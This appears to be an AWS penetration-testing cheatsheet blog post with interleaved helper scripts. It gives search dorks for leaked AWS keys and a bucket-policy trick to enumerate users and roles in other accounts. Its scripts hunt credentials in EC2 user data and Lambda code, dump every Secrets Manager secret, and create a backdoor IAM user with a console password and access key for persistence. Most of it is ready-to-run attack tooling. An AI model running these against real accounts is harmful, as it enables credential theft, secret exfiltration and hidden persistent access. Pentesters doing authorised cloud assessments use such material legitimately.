AWS pentesting may seem a bit annoying, but once you understand all the services, the possibilities for lateral movement and the potential for privilege escalation due to common misconfigurations, trust me, it can be fun :). Here's just a little personal cheatsheet with commands that help me when I have to list an AWS environment.
Unauthenticated Enumeration
Without credentials, look for leaked keys (see the dorks below) or abuse cross-account resource policies to enumerate users, roles and services in the target account (you need at least the target account ID).
Resources:
- aws-role-enumeration-iam
- aws-iam-user-enumeration
- enumerating-services-in-aws-accounts
- This tool looks good and is referenced in the posts above, but I couldn't get it to work :( Quiet-riot, an enumeration tool for scalable, unauthenticated validation of AWS...
Dorks
S3:
site:http://s3.amazonaws.com intitle:index.of.bucket
site:http://amazonaws.com inurl:".s3.amazonaws.com/"
site:.s3.amazonaws.com "Company"
intitle:index.of.bucket
site:http://s3.amazonaws.com intitle:Bucket loading
site:*.amazonaws.com inurl:index.html
site:s3.amazonaws.com filetype:sql
site:s3.amazonaws.com filetype:json
site:s3.amazonaws.com intext:"AccessKeyId"
site:s3.amazonaws.com ext:log
Creds/Keys:
filename:.bash_profile aws
rds.amazonaws.com password
filename:credentials aws_access_key_id
filename:credentials aws_secret_access_key
Cross-Account ("Unauthenticated") Reconnaissance
Enumerate users and roles:
If you already have keys, first check who you are (prints the user or role name from the caller ARN):
aws sts get-caller-identity --query "Arn" --output text | cut -d'/' -f2
- Create a bucket in your own AWS account and put a bucket policy on it that names a principal in the target account. S3 validates the principal before it accepts the policy, so if the put succeeds the user or role exists, and if it fails with an "Invalid principal in policy" error it does not. The PutBucketPolicy calls are logged in your account's CloudTrail, not the target's.
- Both users and roles can be enumerated this way; you need the target account ID.
- You can do it manually, with Pacu (iam__enum_roles and iam__enum_users modules), or with this script: https://github.com/Frichetten/enumate_iam_using_bucket_policy-
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Example permissions",
      "Effect": "Deny",
      "Principal": {
        "AWS": "arn:aws:iam::TargetAccountID:role/role_name"
      },
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::*bucket you own*"
    }
  ]
}
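A scripted version of the bucket-policy oracle described above, added here as an example; it is not part of the original post nor of the linked script. It assumes you own the bucket named on the command line, that the AWS CLI is configured for your own account, and that the wordlist holds guessed user and role names. The classification relies on the "Invalid principal in policy" text S3 returns for a nonexistent principal, so any other failure (AccessDenied, throttling) is reported as an error instead of being guessed.

```shell
#!/usr/bin/env bash
# Cross-account IAM principal enumeration via S3 bucket policy validation.
# Added example, not from the original post. Assumes: you own $BUCKET in your
# own account, the AWS CLI is configured for that account, and the wordlist
# holds guessed names (constructed input, not real data).
set -u

# Build a Deny policy naming one principal in the target account. S3 checks
# that the principal exists before accepting the policy, which is the oracle.
build_policy() {
  local bucket="$1" account="$2" kind="$3" name="$4"   # kind: user or role
  printf '{"Version":"2012-10-17","Statement":[{"Sid":"enum","Effect":"Deny","Principal":{"AWS":"arn:aws:iam::%s:%s/%s"},"Action":"s3:ListBucket","Resource":"arn:aws:s3:::%s"}]}' \
    "$account" "$kind" "$name" "$bucket"
}

# Classify the CLI's result: success means the principal exists, an invalid
# principal means it does not, anything else is an error we must not guess on.
classify_result() {
  local rc="$1" stderr="$2"
  if [ "$rc" -eq 0 ]; then echo exists
  elif printf '%s' "$stderr" | grep -q 'Invalid principal in policy'; then echo missing
  else echo error; fi
}

# Probe one principal; prints "<kind>/<name> <exists|missing|error>".
probe_principal() {
  local bucket="$1" account="$2" kind="$3" name="$4" err rc
  err=$(aws s3api put-bucket-policy --bucket "$bucket" \
          --policy "$(build_policy "$bucket" "$account" "$kind" "$name")" 2>&1 >/dev/null)
  rc=$?
  echo "$kind/$name $(classify_result "$rc" "$err")"
}

# Try every name in the wordlist as both a user and a role in the target account.
enumerate_principals() {
  local bucket="$1" account="$2" wordlist="$3" name
  while IFS= read -r name; do
    [ -z "$name" ] && continue
    probe_principal "$bucket" "$account" user "$name"
    probe_principal "$bucket" "$account" role "$name"
  done < "$wordlist"
  # Do not leave a policy naming the target behind on your bucket.
  aws s3api delete-bucket-policy --bucket "$bucket" >/dev/null 2>&1
}

if [ "${1:-}" = "run" ]; then
  # usage: ./enum_principals.sh run <your-bucket> <target-account-id> <wordlist>
  enumerate_principals "$2" "$3" "$4"
fi
```

Run it as ./enum_principals.sh run <your-bucket> <target-account-id> names.txt. It removes the bucket policy when it finishes so a stale Deny naming the target does not stay on your bucket.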
Authenticated Enumeration
To find ways to move laterally between accounts or to escalate privileges, first map what the compromised principal can do:
- What permissions does my user have (inline and attached policies)?
- Which groups does my user belong to? -> What policies are attached to those groups?
- Which roles trust my user or account? -> What policies are attached to those roles?
- Can my user assume other roles (sts:AssumeRole plus a matching trust policy)?
- Can my user attach policies (to itself, a group or a role)?
General enum, basic commands
- Set AWS programmatic keys for authentication (add --profile <name> to store them as a separate named profile)
aws configure
- Enumerate users:
aws iam list-users
- Enumerate all buckets
aws s3api list-buckets --query "Buckets[].Name"
- Enumerate Groups:
aws iam list-groups
- Enumerate IAM roles:
aws iam list-roles
- Enumerate IAM policies:
aws iam list-policies
- Enumerate lambda layers:
aws lambda list-layers
- Enumerate VPCs:
aws ec2 describe-vpcs
- Enumerate CodeDeploy applications:
aws deploy list-applications
- Instance Metadata Service URL (only reachable from inside an instance; if IMDSv2 is enforced, a session token from PUT /latest/api/token is required first):
curl http://169.254.169.254/latest/meta-data
General enum, deep commands
- Enumerate caller identity (whoami):
aws sts get-caller-identity
- Enumerate login profile:
aws iam get-login-profile --user-name $user
- Enumerate Groups for that user:
aws iam list-groups-for-user --user-name $user
- Enumerate policies attached to that user:
aws iam list-attached-user-policies --user-name $user
- Enumerate certificates for that user:
aws iam list-signing-certificates --user-name $user
- Enumerate SSH keys for that user:
aws iam list-ssh-public-keys --user-name $user
- Get SSH Keys details:
aws iam get-ssh-public-key --user-name $user --encoding PEM --ssh-public-key-id APKAUAWOPGE5M47NZEIT
- Check MFA devices for users:
aws iam list-virtual-mfa-devices
- Enumerate policies
aws iam list-policies
- Enumerate group attached Policies:
aws iam list-group-policies --group-name ad-admin
aws iam list-attached-group-policies --group-name ad-admin
- Searching for customer managed policies
aws iam list-policies --scope Local | grep -A2 PolicyName
- Check for policy details of ad-customer-managed-policy.
aws iam get-policy --policy-arn arn:aws:iam::276384657722:policy/ad-customer-managed-policy
- Get the policy version document to check permissions that the policy grants
aws iam get-policy-version --policy-arn arn:aws:iam::276384657722:policy/ad-customer-managed-policy --version-id v1
- Enumerate roles
aws iam list-roles
- Enumerate details for roles
aws iam get-role --role-name ad-loggingrole
- Enumerate policies attached to roles
aws iam list-attached-role-policies --role-name ad-loggingrole
aws iam list-role-policies --role-name ad-loggingrole
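The questions at the top of this section can be answered in one pass. The script below is an added example (not from the original post) that walks the caller's identity to its groups, attached and inline policies and, for a role, its trust policy, then prints every policy document so you can grep it for sts:AssumeRole, iam:Attach*Policy, iam:Put*Policy and the like. It uses only the list/get calls already in this cheatsheet; a configured profile and read access on IAM are assumed, and failures are printed rather than stopping the walk.

```shell
#!/usr/bin/env bash
# Walk the permissions of the calling principal: identity -> groups -> managed
# and inline policies -> default policy version documents.
# Added example, not from the original post. Assumes a configured profile and
# read permissions on the iam list/get calls used.
set -u

# Parse the ARN from sts get-caller-identity into "user <name>" or "role <name>".
#   IAM user:      arn:aws:iam::ACCT:user/alice
#   assumed role:  arn:aws:sts::ACCT:assumed-role/RoleName/SessionName
principal_from_arn() {
  local arn="$1" resource
  resource="${arn##*:}"            # everything after the last colon
  case "$resource" in
    user/*)          echo "user ${resource#user/}" ;;
    assumed-role/*)  resource="${resource#assumed-role/}"; echo "role ${resource%%/*}" ;;
    *)               echo "unknown $resource"; return 1 ;;
  esac
}

# Print the default version document of a managed policy (customer or AWS managed).
dump_managed_policy() {
  local arn="$1" ver
  ver=$(aws iam get-policy --policy-arn "$arn" --query Policy.DefaultVersionId --output text) || return
  echo "## managed $arn ($ver)"
  aws iam get-policy-version --policy-arn "$arn" --version-id "$ver" \
      --query PolicyVersion.Document --output json
}

walk_user() {
  local user="$1" arn g p
  for arn in $(aws iam list-attached-user-policies --user-name "$user" \
                 --query 'AttachedPolicies[].PolicyArn' --output text); do dump_managed_policy "$arn"; done
  for p in $(aws iam list-user-policies --user-name "$user" --query PolicyNames --output text); do
    echo "## inline user/$user $p"
    aws iam get-user-policy --user-name "$user" --policy-name "$p" --query PolicyDocument --output json
  done
  for g in $(aws iam list-groups-for-user --user-name "$user" --query 'Groups[].GroupName' --output text); do
    echo "# group $g"
    for arn in $(aws iam list-attached-group-policies --group-name "$g" \
                   --query 'AttachedPolicies[].PolicyArn' --output text); do dump_managed_policy "$arn"; done
    for p in $(aws iam list-group-policies --group-name "$g" --query PolicyNames --output text); do
      echo "## inline group/$g $p"
      aws iam get-group-policy --group-name "$g" --policy-name "$p" --query PolicyDocument --output json
    done
  done
}

walk_role() {
  local role="$1" arn p
  echo "# trust policy (who is allowed to assume $role)"
  aws iam get-role --role-name "$role" --query Role.AssumeRolePolicyDocument --output json
  for arn in $(aws iam list-attached-role-policies --role-name "$role" \
                 --query 'AttachedPolicies[].PolicyArn' --output text); do dump_managed_policy "$arn"; done
  for p in $(aws iam list-role-policies --role-name "$role" --query PolicyNames --output text); do
    echo "## inline role/$role $p"
    aws iam get-role-policy --role-name "$role" --policy-name "$p" --query PolicyDocument --output json
  done
}

if [ "${1:-}" = "run" ]; then
  set -- $(principal_from_arn "$(aws sts get-caller-identity --query Arn --output text)")
  case "$1" in user) walk_user "$2" ;; role) walk_role "$2" ;; *) echo "unsupported principal: $2" >&2 ;; esac
fi
```

Run ./iam-walk.sh run under the profile you are testing. To answer "can I assume other roles?", also dump the trust policies of every role (aws iam list-roles --query 'Roles[].[RoleName,AssumeRolePolicyDocument]') and look for ones that name your user, your account root or a wildcard principal.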
S3 Enumeration
- List S3 Buckets:
aws s3api list-buckets
- Enumerate bucket objects:
aws s3api list-objects-v2 --bucket data-extractor-repo
aws s3api list-objects --bucket file-uploader-saved-files
- Check whether public access is blocked on a bucket (a NoSuchPublicAccessBlockConfiguration error means no block is configured, so the bucket policy and ACLs decide; the policy status and ACL commands below complete the check):
aws s3api get-public-access-block --bucket data-extractor-repo
- Download objects from the S3 bucket (the destination path is required):
aws s3 cp s3://file-uploader-saved-files/flag .
- Create a bucket:
aws s3api create-bucket --bucket my-bucket --region us-east-1
- Enumerate Bucket Location:
aws s3api get-bucket-location --bucket data-extractor-repo
- Enumerate object versions:
aws s3api list-object-versions --bucket data-extractor-repo
- Enumerate bucket policy:
aws s3api get-bucket-policy --bucket insecurecorp-code --output text | python -m json.tool
- Enumerate buckets ACLs and object ACLs:
aws s3api get-bucket-acl --bucket file-uploader-saved-files
aws s3api get-object-acl --bucket file-uploader-saved-files --key flag
- Modify bucket policy :
aws s3api put-bucket-policy --bucket $bucketName --policy file://policy.json
- Modify bucket ACL:
aws s3api put-bucket-acl --bucket $bucketName --access-control-policy file://acl.json
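get-public-access-block on its own does not tell you whether a bucket is exposed: it errors when no block is configured, and a partial block can still leave a public policy or ACL effective. The script below is an added example, not from the original post, that combines the three checks the S3 commands above touch separately: the public access block, the IsPublic verdict AWS itself computes for the bucket policy, and ACL grants to the AllUsers/AuthenticatedUsers groups. Bucket names are placeholders and the ACL document used in the test is constructed.

```shell
#!/usr/bin/env bash
# Decide whether a bucket is reachable by everyone, using the three controls
# that matter: public access block, bucket policy status, and ACL grants.
# Added example (not from the original post); bucket names are placeholders.
set -u

PUBLIC_GRANTEES='http://acs.amazonaws.com/groups/global/AllUsers|http://acs.amazonaws.com/groups/global/AuthenticatedUsers'

# Given an ACL document (JSON text), report whether any grant targets the
# AllUsers or AuthenticatedUsers groups. Returns 0 if public, 1 otherwise.
acl_has_public_grant() {
  printf '%s' "$1" | grep -Eq "$PUBLIC_GRANTEES"
}

# Given the four flags of a public access block ("True"/"False" as the CLI
# prints them with --output text), return 0 only when all four are on.
pab_blocks_everything() {
  local f
  for f in "$@"; do [ "$f" = "True" ] || return 1; done
  [ "$#" -eq 4 ]
}

check_bucket() {
  local b="$1" pab status acl
  # 1. Public access block: absent or partial means a policy or ACL can still grant public access.
  pab=$(aws s3api get-public-access-block --bucket "$b" \
          --query 'PublicAccessBlockConfiguration.[BlockPublicAcls,IgnorePublicAcls,BlockPublicPolicy,RestrictPublicBuckets]' \
          --output text 2>/dev/null) || pab=""
  if [ -n "$pab" ] && pab_blocks_everything $pab; then
    echo "$b: fully blocked by public access block"; return
  fi
  # 2. Bucket policy: AWS evaluates the policy and reports whether it is public.
  status=$(aws s3api get-bucket-policy-status --bucket "$b" \
             --query PolicyStatus.IsPublic --output text 2>/dev/null) || status="no-policy"
  # 3. ACL grants to the global groups.
  acl=$(aws s3api get-bucket-acl --bucket "$b" --output json 2>/dev/null) || acl=""
  if [ "$status" = "True" ]; then echo "$b: PUBLIC via bucket policy"
  elif acl_has_public_grant "$acl"; then echo "$b: PUBLIC via ACL"
  else echo "$b: not public (pab='${pab:-none}', policy-public=$status)"; fi
}

if [ "${1:-}" = "run" ]; then
  for b in $(aws s3api list-buckets --query 'Buckets[].Name' --output text); do check_bucket "$b"; done
fi
```

Run ./s3-public-check.sh run to classify every bucket the profile can list. Objects can still carry their own public ACLs, so for an interesting bucket follow up with get-object-acl on the objects you care about.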
EC2 Commands
- Enumerate information about all instances:
aws ec2 describe-instances
- Enumerate information about a specific region:
aws ec2 describe-instances --region $region
- Enumerate information about specific instance:
aws ec2 describe-instances --instance-ids $ID
aws ec2 describe-instance-attribute --attribute userData --region $region --instance-id $instanceId --query UserData.Value --output text > encodeddata; base64 --decode encodeddata
- Enumerate EC2 subnets:
aws ec2 describe-subnets
- Enumerate EC2 network interfaces:
aws ec2 describe-network-interfaces
- List Direct Connect connections (dedicated links from on-premises networks into AWS, not VPNs):
aws directconnect describe-connections
Lambda Commands
- Enumerate lambda layers:
aws lambda list-layers
- Enumerate lambda layers versions and compatible runtimes:
aws lambda list-layer-versions --layer-name php-runtime
- Enumerate lambda layer version information:
aws lambda get-layer-version --layer-name php-runtime --version-number 2
- Enumerate lambda functions:
aws lambda list-functions
- Enumerate lambda function details:
aws lambda get-function --function-name $functionName
- Enumerate event source mappings (what triggers the function):
aws lambda list-event-source-mappings --function-name $functionName
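EC2 user data (decoded with the describe-instance-attribute command in the EC2 section) and Lambda environment variables and deployment packages (get-function above) are the usual places where bootstrap credentials end up. The script below, an added example not from the original post, pulls all three across every region and greps them with a small regex set. The patterns are a starting point only, the sample user data in the test is constructed, and curl and unzip are assumed to be available for the Lambda package, which get-function hands out as a short-lived presigned URL.

```shell
#!/usr/bin/env bash
# Hunt for credentials in EC2 user data and Lambda configuration/code across
# every region. Added example, not from the original post; the secret patterns
# are a starting point, not a complete list.
set -u

# Things worth a second look: access key IDs, CLI credential keys, password-ish assignments.
SECRET_RE='AKIA[0-9A-Z]{16}|ASIA[0-9A-Z]{16}|aws_secret_access_key|(password|passwd|pwd|secret|token|api_key)[[:space:]]*[=:]'

# Print the matching lines of a blob of text (user data, env vars, source) tagged
# with a label. Returns 0 if anything matched, 1 otherwise.
grep_secrets() {
  local label="$1" text="$2" hits
  hits=$(printf '%s\n' "$text" | grep -Ein "$SECRET_RE") || return 1
  printf '%s\n' "$hits" | sed "s|^|$label: |"
}

regions() { aws ec2 describe-regions --query 'Regions[].RegionName' --output text; }

scan_user_data() {
  local region="$1" id data
  for id in $(aws ec2 describe-instances --region "$region" \
                --query 'Reservations[].Instances[].InstanceId' --output text); do
    # User data comes back base64-encoded; decode before grepping.
    data=$(aws ec2 describe-instance-attribute --region "$region" --instance-id "$id" \
             --attribute userData --query UserData.Value --output text 2>/dev/null | base64 --decode 2>/dev/null)
    [ -n "$data" ] && grep_secrets "$region/$id/user-data" "$data"
  done
}

scan_lambda() {
  local region="$1" fn vars url tmp
  for fn in $(aws lambda list-functions --region "$region" --query 'Functions[].FunctionName' --output text); do
    # Environment variables are the most common place for hard-coded secrets.
    vars=$(aws lambda get-function-configuration --region "$region" --function-name "$fn" \
             --query 'Environment.Variables' --output json 2>/dev/null)
    [ -n "$vars" ] && grep_secrets "$region/$fn/env" "$vars"
    # get-function returns a short-lived presigned URL for the deployment package.
    url=$(aws lambda get-function --region "$region" --function-name "$fn" \
            --query Code.Location --output text 2>/dev/null)
    [ -z "$url" ] && continue
    tmp=$(mktemp -d)
    if curl -s "$url" -o "$tmp/code.zip" && unzip -qo "$tmp/code.zip" -d "$tmp/src" 2>/dev/null; then
      grep -rEHin "$SECRET_RE" "$tmp/src" 2>/dev/null | sed "s|^|$region/$fn/code: |"
    fi
    rm -rf "$tmp"
  done
}

if [ "${1:-}" = "run" ]; then
  for r in $(regions); do scan_user_data "$r"; scan_lambda "$r"; done
fi
```

Run ./hunt-secrets.sh run; each hit is prefixed with region, resource and where it was found. Expect noise from the password-style patterns and extend SECRET_RE with whatever the target's own naming conventions look like.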
Databases Commands
- Enumerate tables associated with the current account:
aws dynamodb list-tables
- Enumerate information about the table:
aws dynamodb describe-table --table-name $tableName
- Enumerate items and attributes in a table:
aws dynamodb scan --table-name $tableName
- Enumerate backup of a table:
aws dynamodb describe-backup --backup-arn $backupArn
- Add new table to your account:
aws dynamodb create-table --table-name $tableName --attribute-definitions AttributeName=id,AttributeType=S --key-schema AttributeName=id,KeyType=HASH --billing-mode PAY_PER_REQUEST
- Edit an item attribute or adds new item to the table:
aws dynamodb update-item --table-name $tableName --key '{"id": {"S": "1"}}' --update-expression "SET #a = :v" --expression-attribute-names '{"#a": "attribute"}' --expression-attribute-values '{":v": {"S": "value"}}'
- List AWS RDS (SQL):
aws rds describe-db-instances --region $regionName
Secrets enumeration Commands
- List all secrets, sorted by Name:
aws secretsmanager list-secrets --query 'sort_by(SecretList, &Name)[]'
- Get a specific secret's value, extracted with jq:
aws secretsmanager get-secret-value --secret-id $SECRET_ID | jq -r ".SecretString"
- Python3 script, get all secrets:
#!/usr/bin/env python3
# Dump every Secrets Manager secret the caller can read.
import json
import subprocess

def aws(*args):
    # Argument list, no shell: a secret name cannot inject shell syntax.
    return json.loads(subprocess.run(["aws", *args], capture_output=True, text=True, check=True).stdout)

# The CLI paginates list-secrets itself; iterate the SecretList, not every value in the dict.
for s in aws("secretsmanager", "list-secrets").get("SecretList", []):
    try:
        data = aws("secretsmanager", "get-secret-value", "--secret-id", s["ARN"])
    except subprocess.CalledProcessError as e:  # e.g. AccessDenied on one secret: keep going
        print("{}: ERROR {}".format(s["Name"], e.stderr.strip()))
        continue
    # A secret is either a string or base64-encoded binary.
    print("{}: {}".format(s["Name"], data.get("SecretString") or data.get("SecretBinary")))
Persistence [IN PROGRESS...]
Create new user and enable login with password
- Create user:
aws iam create-user --user-name eviluser
- Create the login profile; you can use the following JSON as input:
cat create-login-profile.json
{
  "UserName": "eviluser",
  "Password": "SuperSecretPassword",
  "PasswordResetRequired": false
}
- Create the login profile for the new user from that file:
aws iam create-login-profile --cli-input-json file://create-login-profile.json
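The steps above wired together, as an added example rather than the post's own script: it creates the user, generates a password that satisfies the default IAM password policy, creates the login profile from the same JSON shape as above and, going one step beyond the post, adds an access key so the foothold survives a console password reset; a remove mode undoes all of it. User names are placeholders and the required permissions (iam:CreateUser, iam:CreateLoginProfile, iam:CreateAccessKey and their delete counterparts) are assumed.

```shell
#!/usr/bin/env bash
# Backdoor user with console and programmatic access, plus the commands to
# remove it afterwards. Added example, not from the original post; requires
# iam:CreateUser, iam:CreateLoginProfile and iam:CreateAccessKey.
set -u

# Random password: n alphanumerics plus one of each class the default IAM
# password policy can ask for (upper, lower, digit, symbol).
gen_password() {
  local n="${1:-24}"
  printf '%s' "$(LC_ALL=C tr -dc 'A-Za-z0-9' </dev/urandom | head -c "$n")Aa1!"
}

# JSON for create-login-profile --cli-input-json (same shape as in the post).
login_profile_json() {
  printf '{"UserName":"%s","Password":"%s","PasswordResetRequired":false}' "$1" "$2"
}

create_backdoor() {
  local user="$1" pw acct
  pw=$(gen_password)
  aws iam create-user --user-name "$user" >/dev/null
  aws iam create-login-profile --cli-input-json "$(login_profile_json "$user" "$pw")" >/dev/null
  acct=$(aws sts get-caller-identity --query Account --output text)
  echo "console: https://${acct}.signin.aws.amazon.com/console  user=$user password=$pw"
  # Programmatic access survives a console password reset; keep both.
  aws iam create-access-key --user-name "$user" \
      --query 'AccessKey.[AccessKeyId,SecretAccessKey]' --output text
}

# Undo everything created above (login profile and keys must go before the user).
remove_backdoor() {
  local user="$1" k
  aws iam delete-login-profile --user-name "$user" 2>/dev/null
  for k in $(aws iam list-access-keys --user-name "$user" --query 'AccessKeyMetadata[].AccessKeyId' --output text); do
    aws iam delete-access-key --user-name "$user" --access-key-id "$k"
  done
  aws iam delete-user --user-name "$user"
}

case "${1:-}" in
  create) create_backdoor "$2" ;;
  remove) remove_backdoor "$2" ;;
esac
```

Usage: ./backdoor-user.sh create eviluser, and ./backdoor-user.sh remove eviluser when the engagement is over. Every call here lands in CloudTrail (CreateUser, CreateLoginProfile, CreateAccessKey), which is exactly what a defender's detection rules should key on.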
Tools
Pacu
Installation:
mkdir pacu && cd pacu
python3 -m venv venv && source venv/bin/activate
pip install -U pacu
- Import AWS keys for a specific profile
import_keys <profile name>
- Detect if keys are honey token keys
run iam__detect_honeytokens
- Enumerate account information and permissions
run iam__enum_users_roles_policies_groups
run iam__enum_permissions
whoami
- Check for privilege escalation
run iam__privesc_scan
ScoutSuite
Installation:
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite
scout --help
scout aws --profile myprofile
ScoutSuite findings:
Just a list of common ScoutSuite findings and how to check them: